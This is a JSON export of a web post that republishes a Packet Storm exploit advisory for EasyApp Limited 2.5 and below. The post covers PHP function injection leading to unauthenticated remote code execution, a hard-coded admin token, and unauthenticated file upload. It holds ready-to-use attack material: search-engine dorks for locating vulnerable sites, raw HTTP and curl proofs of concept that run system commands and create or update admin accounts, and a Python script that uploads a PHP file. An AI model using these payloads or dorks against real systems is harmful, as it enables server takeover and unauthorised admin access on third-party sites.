{"id":14018,"date":"2025-08-22T13:37:45","date_gmt":"2025-08-22T13:37:45","guid":{"rendered":"http:\/\/localhost\/?p=14018"},"modified":"2025-08-22T13:37:45","modified_gmt":"2025-08-22T13:37:45","slug":"easyapp-limited-25-remote-code-execution-deserialization-file-upload","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=14018","title":{"rendered":"\ud83d\udcc4 EasyApp Limited 2.5 Remote Code Execution \/ Deserialization \/ File Upload_PACKETSTORM:208780"},"content":{"rendered":"

{“lastseen”:”2025-08-22T17:56:38″,”description”:”EasyApp Limited versions 2.5 and below suffer from PHP object injection allowing for remote code execution, arbitrary file upload, and hardcoded credential vulnerabilities. It looks like it may also suffer from cross…”,”published”:”2025-08-22T00:00:00″,”modified”:”2025-08-22T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 EasyApp Limited 2.5 Remote Code Execution \/ Deserialization \/ File Upload”,”source”:””,”references”:””,”id”:”PACKETSTORM:208780″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”# Exploit Title: EasyApp Limited – Multiple Vulnerabilities\\n # Date: 2025-06-27\\n # Exploit Author: bRpsd -\\u003e cy[at]live.no\\n # Vendor Homepage: https:\/\/easyapp.com.hk\/\\n # Products: Easy Shop, Easy Food, Handlebook\\n # Affected Versions: v2.5 and below\\n # CVE: N\/A\\n # Tested on: localhost xampp, MacOS\\n # Dorks:\\n \\”Powered By Easyapp \u00a9\u00a02025\\”\\n Powered By EasyApp Limited inurl:app\/web\\n \\”Powered By EasyApp Limited\\”\\n \\”DESIGN BY\u00a0HANDLEBOOK EDUCATION SOLUTIONS\u00a0\u00a9 2025\\”\\n \\”EasyApp Login\\”\\n inurl:\/web\/product_detail.php?linkid=\\n inurl:app\/admin2\/login.php\\n inurl:app\/#!\/template\/newsList.php\\n \\n \\n \\n \\n ##########################################################################################\\n Vulnerability: PHP Object Injection \\”CWE-502: Deserialization of Untrusted Data\\”\\n The function directly processes unsanitized JSON input from php:\/\/input leading to Unauthenticated RCE\\n File: \/app\/php\/data.php\\n \\n Code:\\n =================================================================================\\n \\t$path = $_SERVER[‘DOCUMENT_ROOT’];\\n \\tinclude_once($path);\\n \\t$json = json_decode(file_get_contents(\\”php:\/\/input\\”),true) ; \\n \\t\/\/ Calling Custom Function\\n \\techo json_encode($json[\\”action\\”]($json[\\”data\\”]));\\n =================================================================================\\n \\n \\n \\n POC:\\n ==========================================================================================\\n POST https:\/\/localhost\/app\/php\/data.php HTTP\/1.1\\n host: localhost\\n User-Agent: Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:142.0) Gecko\/20100101 Firefox\/142.0\\n Accept: application\/json, text\/javascript, *\/*; q=0.01\\n Accept-Language: en-US,en;q=0.5\\n Content-Type: application\/x-www-form-urlencoded; charset=UTF-8\\n X-Requested-With: XMLHttpRequest\\n content-length: 35\\n Connection: keep-alive\\n Cookie: _ga_RRH2QH5VDJ=GS2.1.s1755785674$o1$g1$t1755785674$j60$l0$h0; _ga=GA1.1.1404825214.1755785674\\n Sec-Fetch-Dest: empty\\n Sec-Fetch-Mode: cors\\n Sec-Fetch-Site: same-origin\\n \\n {\\”action\\”:\\”system\\”,\\”data\\”:\\”whoami\\”}\\n \\n \\n Response:\\n HTTP\/1.1 200 OK\\n Date: Thu, 15 Aug 2025 14:19:26 GMT\\n Content-Type: text\/html; charset=UTF-8\\n Connection: keep-alive\\n \\n root\\n \\”root\\”\\n \\n \\n \\n Using CURL:\\n curl -X POST https:\/\/localhost\/app\/php\/data.php \\\\\\n -H \\”Content-Type: application\/json\\” \\\\\\n -d ‘{\\”action\\”:\\”system\\”,\\”data\\”:\\”uname\\”}’\\n \\n \\”Darwin\\”\\n \\n \\n \\n \\n ##########################################################################################\\n Vulnerability 2: Static Token Bypass (CWE-798: Use of Hard-coded Credentials) \\n File: \/app\/admin2\/php\/data.php\\n Code:\\n =================================================================================\\n function getAppAccessRight($functionName,$param)\\n {\\n $data = array();\\n \\t\\t$data[\\”status\\”] = \\”SUCCESS\\” ; \\n $uid = $_COOKIE[\\”uid\\”] ; \\n $token = $_COOKIE[\\”token\\”] ; \\n $escapeFunction = ESCAPE_FUNC_TOKEN ; \\n \/\/ echo $functionName . \\”\\u003cbr\/\\u003e\\”;\\n \/\/ echo $escapeFunction . \\”\\u003cbr\/\\u003e\\”;\\n if (strpos($escapeFunction, $functionName) !==false)\\n return $data ; \\n \\t\\tif ($token == \\”abcdefghijklmnopqrstuvwxyz1234567890\\”)\\n \\t\\t\\treturn $data ; \\n =================================================================================\\n \\n \\n This means calling arbitrary admin functions via \/app\/admin2\/php\/data.php can be easily bypassed,We can use this hard-coded token to (create admin, update an admin) and trigger MANY other admin-based functions directly:\\n \\n POC:\\n ==========================================================================================\\n curl -X POST \\\\\\n ‘https:\/\/localhost\/app\/admin2\/php\/data.php’ \\\\\\n -H ‘Cookie: token=abcdefghijklmnopqrstuvwxyz1234567890; blogin=true; uid=1; logined=true; token=true’ \\\\\\n -H ‘Content-Type: application\/json’ \\\\\\n -d ‘{\\n \\”action\\”: \\”updateAdmin\\”,\\n \\”data\\”: {\\n \\”fullname\\”: \\”X\\”,\\n \\”loginid\\”: \\”XXXXXXXXXX\\”,\\n \\”pwd\\”: \\”XXXXXXXXXX\\”,\\n \\”email\\”: \\”X@X.com\\”,\\n \\”role\\”: \\”ADMIN\\”,\\n \\”userid\\”: \\”1\\”,\\n \\”imgattachid\\”: \\”1\\”\\n }\\n }’\\n \\n Response:\\n {\\”uid\\”:\\”UID_HERE\\”,\\”status\\”:\\”SUCCESS\\”}\\n \\t\\t\\t\\n \\t\\t\\t\\n curl -X POST \\\\\\n ‘https:\/\/localhost\/app\/admin2\/php\/data.php’ \\\\\\n -H ‘Cookie: token=abcdefghijklmnopqrstuvwxyz1234567890; blogin=true; uid=1; logined=true; token=true’ \\\\\\n -H ‘Content-Type: application\/json’ \\\\\\n -d ‘{\\n \\”action\\”: \\”createAdmin\\”,\\n \\”data\\”: {\\n \\”fullname\\”: \\”X\\”,\\n \\”loginid\\”: \\”X\\”,\\n \\”pwd\\”: \\”X\\”,\\n \\”email\\”: \\”X@X.com\\”,\\n \\”role\\”: \\”ADMIN\\”,\\n \\”userid\\”: \\”1\\”,\\n \\”imgattachid\\”: \\”1\\”\\n }\\n }’\\n Response:\\n {\\”uid\\”:\\”UID_HERE\\”,\\”status\\”:\\”SUCCESS\\”}\\n ==========================================================================================\\n \\n \\n \\n \\n \\n ##########################################################################################\\n Vulnerability: Unauthenticated Arbitrary File UPLOAD,DELETE \\u0026 Exposure\\n path: app\/admin2\/userimg\\n \\n Direct access expose list of files uploaded to the directory \/app\/admin2\/userimg\/:\\n \\n Example:\\n {\\”files\\”:[{\\”name\\”:\\”x.jpg\\”,\\”size\\”:4,\\”url\\”:\\”https:\\\\\/\\\\\/localhost\\\\\/app\\\\\/admin2\\\\\/userimg\\\\\/files\\\\\/x.jpg\\”,\\”deleteUrl\\”:\\”https:\\\\\/\\\\\/localhost.hk\\\\\/app\\\\\/admin2\\\\\/userimg\\\\\/index2.php?file=x.jpg\\”,\\”deleteType\\”:\\”DELETE\\”}]}\\n \\n We can run direct commands to upload\/delete\\n \\n Python Code for uploading a test.php:\\n ==========================================================================================\\n import requests\\n # Define the URL and headers\\n url = \\”https:\/\/localhost\/app\/admin2\/userimg\/\\”\\n headers = {\\n \\”User-Agent\\”: \\”Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:141.0) Gecko\/20100101 Firefox\/141.0\\”,\\n \\”Accept\\”: \\”application\/json, text\/javascript, *\/*; q=0.01\\”,\\n \\”Accept-Language\\”: \\”en-US,en;q=0.5\\”,\\n \\”Accept-Encoding\\”: \\”gzip, deflate, br, zstd\\”,\\n \\”X-Requested-With\\”: \\”XMLHttpRequest\\”,\\n \\”Origin\\”: \\”https:\/\/localhost\/\\”,\\n \\”Connection\\”: \\”keep-alive\\”,\\n \\”Referer\\”: \\”https:\/\/localhost\/app\/admin2\/news-list-add.php\\”,\\n \\”Sec-Fetch-Dest\\”: \\”empty\\”,\\n \\”Sec-Fetch-Mode\\”: \\”cors\\”,\\n \\”Sec-Fetch-Site\\”: \\”same-origin\\”\\n }\\n \\n # Payload to accept file (some settings allow direct PHP upload, others don’t)\\n payload = {\\n ‘attachid’: ‘1’,\\n ‘gtitle_zh’: ‘1’,\\n ‘linkid’: ‘1’\\n }\\n \\n files = {\\n ‘files[]’: (‘x.PhP’, ‘test’, ‘multipart\/form-data’)\\n }\\n \\n response = requests.post(url, headers=headers, data=payload, files=files)\\n \\n # Print the response\\n print(f\\”Status Code: {response.status_code}\\”)\\n print(\\”Response Text:\\”, response.text)\\n ==========================================================================================\\n \\n \\n \\n Too lazy to list the OTHER weakness points such as:\\n 1- Using HTML JS redirection to prevent admin access [\/app\/admin2\/] instead of PHP-based code. Meaning anyone can view admin dashboard and its HTML source code \\u0026 tamper around.\\n \\n 2- IP Address Spoofing by relying on HTTP_CLIENT_IP or HTTP_X_FORWARDED_FOR headers for authentication which can be spoofed\\n \\n 3- Weak Cryptography\\n \\n 4- No CSRF\/XSS\/SQLi control\\n \\n 5- Imporoper control of code generation like using \\”strpos($escapeFunction, $functionName)\\” instead of \\”strpos($functionName, $escapeFunction)\\”, Misspelled \\”TRUE\\” as \\”TURE\\” in 2FA activation..\\n \\n 6- Accessible test files in paths like \/app\/admin2\/testFn.php [Arbitrary File Upload], along with other vulnerable endpoints”,”sourceHref”:”https:\/\/packetstorm.news\/download\/208780″,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/208780\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2025-08-22T17:56:38″,”description”:”EasyApp Limited versions 2.5 and below suffer from PHP object injection allowing for remote code execution, arbitrary file upload, and hardcoded credential vulnerabilities. It looks…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-14018","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 EasyApp Limited 2.5 Remote Code Execution \/ Deserialization \/ File Upload_PACKETSTORM:208780 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=14018\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 EasyApp Limited 2.5 Remote Code Execution \/ Deserialization \/ File Upload_PACKETSTORM:208780 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2025-08-22T17:56:38″,”description”:”EasyApp Limited versions 2.5 and below suffer from PHP object injection allowing for remote code execution, arbitrary file upload, and hardcoded credential vulnerabilities. It looks...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=14018\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-08-22T13:37:45+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=14018#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=14018\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 EasyApp Limited 2.5 Remote Code Execution \\\/ Deserialization \\\/ File Upload_PACKETSTORM:208780\",\"datePublished\":\"2025-08-22T13:37:45+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=14018\"},\"wordCount\":1086,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"exploit\",\"news\",\"NONE\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=14018#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=14018\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=14018\",\"name\":\"\ud83d\udcc4 EasyApp Limited 2.5 Remote Code Execution \\\/ Deserialization \\\/ File Upload_PACKETSTORM:208780 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-08-22T13:37:45+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=14018#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=14018\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=14018#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 EasyApp Limited 2.5 Remote Code Execution \\\/ Deserialization \\\/ File Upload_PACKETSTORM:208780\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 EasyApp Limited 2.5 Remote Code Execution \/ Deserialization \/ File Upload_PACKETSTORM:208780 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=14018","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 EasyApp Limited 2.5 Remote Code Execution \/ Deserialization \/ File Upload_PACKETSTORM:208780 - zero redgem","og_description":"{“lastseen”:”2025-08-22T17:56:38″,”description”:”EasyApp Limited versions 2.5 and below suffer from PHP object injection allowing for remote code execution, arbitrary file upload, and hardcoded credential vulnerabilities. It looks...","og_url":"https:\/\/zero.redgem.net\/?p=14018","og_site_name":"zero redgem","article_published_time":"2025-08-22T13:37:45+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"5 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=14018#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=14018"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 EasyApp Limited 2.5 Remote Code Execution \/ Deserialization \/ File Upload_PACKETSTORM:208780","datePublished":"2025-08-22T13:37:45+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=14018"},"wordCount":1086,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","exploit","news","NONE","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=14018#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=14018","url":"https:\/\/zero.redgem.net\/?p=14018","name":"\ud83d\udcc4 EasyApp Limited 2.5 Remote Code Execution \/ Deserialization \/ File Upload_PACKETSTORM:208780 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-08-22T13:37:45+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=14018#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=14018"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=14018#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 EasyApp Limited 2.5 Remote Code Execution \/ Deserialization \/ File Upload_PACKETSTORM:208780"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/14018","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=14018"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/14018\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=14018"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=14018"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=14018"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}